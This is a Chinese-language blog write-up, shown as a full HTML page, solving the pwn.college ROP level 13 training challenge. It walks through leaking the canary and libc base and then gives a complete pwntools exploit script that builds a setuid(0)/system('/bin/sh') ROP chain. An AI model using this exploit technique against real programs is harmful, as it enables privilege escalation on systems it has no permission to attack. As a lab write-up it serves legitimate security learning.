

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="">
  <meta name="keywords" content="">
  
    <meta name="description" content="题目简介题目提示这道题存在canary保护，因此要想办法绕过canary（爆破或泄露）">
<meta property="og:type" content="article">
<meta property="og:title" content="level-13">
<meta property="og:url" content="http://0x4a-210.github.io/2025/07/20/pwn.college/Program-Securtity/ROP/level-13/index.html">
<meta property="og:site_name" content="0x4A">
<meta property="og:description" content="题目简介题目提示这道题存在canary保护，因此要想办法绕过canary（爆破或泄露）">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/Program-Security/ROP/level-13/IDA.png">
<meta property="og:image" content="http://0x4a-210.github.io/photos/pwn.college/Program-Security/ROP/level-13/flag.png">
<meta property="article:published_time" content="2025-07-20T02:46:55.000Z">
<meta property="article:modified_time" content="2025-07-20T03:33:57.822Z">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://0x4a-210.github.io/photos/pwn.college/Program-Security/ROP/level-13/IDA.png">
  
  
  
  <title>level-13 - 0x4A</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"0x4a-210.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0x4A</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/Istaroth.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="level-13"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-07-20 10:46" pubdate>
          July 20, 2025 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          958 words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          8 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">level-13</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="题目简介"><a href="#题目简介" class="headerlink" title="题目简介"></a>题目简介</h1><p>题目提示这道题存在canary保护，因此要想办法绕过canary（爆破或泄露）</p>
<span id="more"></span>
<h1 id="漏洞点分析"><a href="#漏洞点分析" class="headerlink" title="漏洞点分析"></a>漏洞点分析</h1><p>老样子checksec看一下除了canary还开了什么，看到保护全开，只能ROP，但是还要想办法在运行时获取libc基地址<br><br>接下来靠IDA了，拖进去看一下发现可以在输入之前读取buffer起始地址和任意地址处的内容<br><br><img src="/../../../../photos/pwn.college/Program-Security/ROP/level-13/IDA.png" srcset="/img/loading.gif" lazyload><br>可以看到溢出点在main函数，在溢出点前面可以泄露buffer起始地址和一个任意地址处的内容<br><br>综上，漏洞点利用思路就清晰了：<br><br>应该分为两个阶段发送payload，这一点其实和第4题类似<a href="https://0x4a-210.github.io/2025/07/20/pwn.college/Program-Securtity/ROP/level-4/">pwn.college题解：ROP-level-4</a><br><br>只不过多了需要泄露canary的步骤，以及需要换一种方法泄露libc基地址（因为开启了PIE，gadget不再可用）</p>
<h1 id="漏洞点利用"><a href="#漏洞点利用" class="headerlink" title="漏洞点利用"></a>漏洞点利用</h1><p>首先，第一次泄露canary，由于题目会直接泄露buffer起始地址，只要用这个地址+(offset-16)，在第二次泄露时泄露该地址的值就是canary<br><br>接下来是泄露libc基地址以及返回程序开始的地方以触发第二阶段<br><br>但是，程序开启了PIE，无法像level-4那样，通过调用gadget直接打印某个libc函数的真实地址，并且通过pwn的symbols方法获取_start函数的地址以返回开始的地方<br><br>不过，注意到溢出点在main函数。根据main函数的启动和退出机制，见<a href="https://0x4a-210.github.io/2025/07/19/TogetherReview/Binary-Exp/">串联梳理：Pwn-Exp</a><br><br>所以低位覆盖，让它回到_libc_start_main即可开启二阶段；同样可以在第二阶段通过leak泄露返回地址的值，减去最低位的一个半字节即可<br><br>综上，可以编写出如下的利用脚本：<br></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>targetELF=<span class="hljs-string">&quot;/challenge/babyrop_level13.1&quot;</span><br>libcPath = <span class="hljs-string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;x86_64&#x27;</span>, terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>, <span class="hljs-string">&#x27;splitw&#x27;</span>, <span class="hljs-string">&#x27;-h&#x27;</span>],log_level=<span class="hljs-string">&quot;debug&quot;</span>)<br>ioHandler=process(targetELF)<br><span class="hljs-comment">#ioHandler=gdb.debug(targetELF,&quot;b *main+785&quot;)</span><br><br>offset=<span class="hljs-number">136</span><br><br><span class="hljs-comment">#/bin/sh字符串的偏移=0x1b45bd</span><br>binshOffset=<span class="hljs-number">0x1b45bd</span><br><br>elf=ELF(targetELF)<br>libc=ELF(libcPath)<br><br>gotAddr=elf.got[<span class="hljs-string">&quot;puts&quot;</span>]<br><br>pop_rdi_offset=<span class="hljs-number">0x23b6a</span><br>sysOffset=libc.symbols[<span class="hljs-string">&quot;system&quot;</span>]<br>setuidOffset=libc.symbols[<span class="hljs-string">&quot;setuid&quot;</span>]<br>binshOffset=<span class="hljs-number">0x1b45bd</span><br><br><br>ioHandler.recvuntil(<span class="hljs-string">&quot;[LEAK] Your input buffer is located at: &quot;</span>)<br>bufferStart=ioHandler.recvuntil(<span class="hljs-string">&#x27;.&#x27;</span>).decode()<br><span class="hljs-keyword">if</span> bufferStart[-<span class="hljs-number">1</span>]==<span class="hljs-string">&#x27;.&#x27;</span>:<br>    bufferStart=bufferStart[:-<span class="hljs-number">1</span>]<br>bufferStart=<span class="hljs-built_in">int</span>(bufferStart,<span class="hljs-number">16</span>)<br>ioHandler.recvuntil(<span class="hljs-string">&quot;Address in hex to read from:&quot;</span>)<br>canaryAddr=bufferStart+offset-<span class="hljs-number">16</span><br>ioHandler.sendline(<span class="hljs-built_in">hex</span>(canaryAddr).encode(<span class="hljs-string">&quot;ascii&quot;</span>))<br>ioHandler.recvuntil(<span class="hljs-string">&quot; = &quot;</span>)<br>canary=ioHandler.recv().decode()<br>canary=<span class="hljs-built_in">int</span>(canary,<span class="hljs-number">16</span>)<br><br>payload1=<span class="hljs-string">b&#x27;a&#x27;</span>*(offset-<span class="hljs-number">16</span>)+p64(canary)+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">8</span>+<span class="hljs-number">0x2D</span>.to_bytes(<span class="hljs-number">1</span>,<span class="hljs-string">&#x27;little&#x27;</span>)<br>ioHandler.send(payload1)<br><br><br><span class="hljs-comment">#回来了</span><br>ioHandler.recvuntil(<span class="hljs-string">&quot;[LEAK] Your input buffer is located at: &quot;</span>)<br>bufferAgain=ioHandler.recvuntil(<span class="hljs-string">&#x27;.&#x27;</span>).decode()<br><span class="hljs-keyword">if</span> bufferAgain[-<span class="hljs-number">1</span>]==<span class="hljs-string">&#x27;.&#x27;</span>:<br>    bufferAgain=bufferAgain[:-<span class="hljs-number">1</span>]<br>bufferAgain=<span class="hljs-built_in">int</span>(bufferAgain,<span class="hljs-number">16</span>)<br>ioHandler.recvuntil(<span class="hljs-string">&quot;Address in hex to read from:&quot;</span>)<br>call_start=bufferAgain+offset<br>ioHandler.sendline(<span class="hljs-built_in">hex</span>(call_start).encode(<span class="hljs-string">&quot;ascii&quot;</span>))<br>ioHandler.recvuntil(<span class="hljs-string">&quot; = &quot;</span>)<br>realCall_start=<span class="hljs-built_in">int</span>(ioHandler.recv().decode(),<span class="hljs-number">16</span>)<br><span class="hljs-built_in">print</span>(realCall_start)<br>libcBase=realCall_start-<span class="hljs-number">0x24083</span>  <span class="hljs-comment">#为什么是24083，gdb看返回地址，最后3位是083，说明call main的指令偏移最后3位是083，再逆向libc.so，去里面找完整偏移??083，看到是24083</span><br><br>pop_rdiAddr=libcBase+pop_rdi_offset<br>sysAddr=libcBase+sysOffset<br>binshAddr=libcBase+binshOffset<br>setuidAddr=libcBase+setuidOffset<br><br>payload2=<span class="hljs-string">b&#x27;a&#x27;</span>*(offset-<span class="hljs-number">16</span>)+p64(canary)+<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">8</span>+p64(pop_rdiAddr)+p64(<span class="hljs-number">0</span>)+p64(setuidAddr)+p64(pop_rdiAddr)+p64(binshAddr)+p64(sysAddr)<br><br>ioHandler.send(payload2)<br>ioHandler.recv()<br><br>ioHandler.interactive()<br></code></pre></td></tr></table></figure>
<p><img src="/../../../../photos/pwn.college/Program-Security/ROP/level-13/flag.png" srcset="/img/loading.gif" lazyload><br>总结一下，这道题其实不难，但却卡了很久，主要是因为：<br><br>一方面不熟悉main函数的启动和退出机制，对libc.so共享文件不了解<br><br>另一方面还是在前面的题目中形成了思维定势，没有分清什么才是目的什么只是手段<br><br>其实真正的目的就是泄露libc基址，可以通过puts函数等程序运行时调用的函数泄露（如第4题），也可以像这题一样，利用给exit传参的指令地址泄露，减去偏移<br><br>总的来说，只要能拿到libc里某条指令的真实值和偏移，就能拿到libc基址，不应该拘泥于必须通过什么手段去泄露</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/pwn-college%E9%A2%98%E8%A7%A3/" class="category-chain-item">pwn.college题解</a>
  
  
    <span>></span>
    
  <a href="/categories/pwn-college%E9%A2%98%E8%A7%A3/Program-Security/" class="category-chain-item">Program-Security</a>
  
  
    <span>></span>
    
  <a href="/categories/pwn-college%E9%A2%98%E8%A7%A3/Program-Security/ROP/" class="category-chain-item">ROP</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>level-13</div>
      <div>http://0x4a-210.github.io/2025/07/20/pwn.college/Program-Securtity/ROP/level-13/</div>
    </div>
    <div class="license-meta">
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>July 20, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/07/20/pwn.college/Program-Securtity/ROP/level-14-and-15/" title="level-14-and-15">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">level-14-and-15</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/07/20/pwn.college/Program-Securtity/ROP/level-4/" title="level-4">
                        <span class="hidden-mobile">level-4</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
